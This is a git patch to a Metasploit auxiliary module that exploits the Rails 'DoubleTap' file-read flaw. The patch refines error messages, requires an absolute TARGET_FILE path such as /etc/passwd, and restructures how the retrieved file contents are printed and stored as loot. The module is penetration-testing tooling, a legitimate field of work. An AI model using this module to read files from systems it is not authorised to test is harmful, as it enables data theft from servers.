From fd4c70d0d4d9d9aa40fa370d3458bb1aa19d71dc Mon Sep 17 00:00:00 2001 From: cbrnrd Date: Thu, 28 Mar 2019 22:49:07 -0600 Subject: [PATCH] Clean up loot add and route checks --- .../auxiliary/gather/rails_doubletap_file_read.rb | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/gather/rails_doubletap_file_read.rb b/modules/auxiliary/gather/rails_doubletap_file_read.rb index 73fcdbbfac..6f697994b3 100644 --- a/modules/auxiliary/gather/rails_doubletap_file_read.rb +++ b/modules/auxiliary/gather/rails_doubletap_file_read.rb @@ -78,7 +78,7 @@ class MetasploitModule < Msf::Auxiliary print_good 'Target is vulnerable!' return true else - print_error 'Target is not vulnerable.' + print_error 'Target is not vulnerable. Make sure your route is correct.' return false end end @@ -89,6 +89,11 @@ class MetasploitModule < Msf::Auxiliary return end + unless datastore['TARGET_FILE'][0] == '/' + print_error "TARGET_FILE must be an absolute path (eg. /etc/passwd)." + return + end + print_status "Requesting file #{datastore['TARGET_FILE']}" res = send_request_cgi({ @@ -105,10 +110,10 @@ class MetasploitModule < Msf::Auxiliary unless res.code == 200 print_error "Failed to read file: #{datastore['TARGET_FILE']}. HTTP error: #{res.code}." print_error 'User probably doesnt have access to the requested file.' if res.code == 500 - else - print_good 'Response from server:' - print_line res.body.to_s - store_loot('rails.doubletap', 'text/plain', datastore['RHOSTS'], res.body.to_s, "rails_doubletap_read_file_#{Rex::Text.rand_text_alpha(8)}.txt", "File read via Rails DoubleTap exploit.") + return end + print_good 'Response from server:' + print_line res.body.to_s + store_loot('rails.doubletap.file', 'text/plain', datastore['RHOSTS'], res.body.to_s, datastore['TARGET_FILE'], "File read via Rails DoubleTap auxiliary module.") end end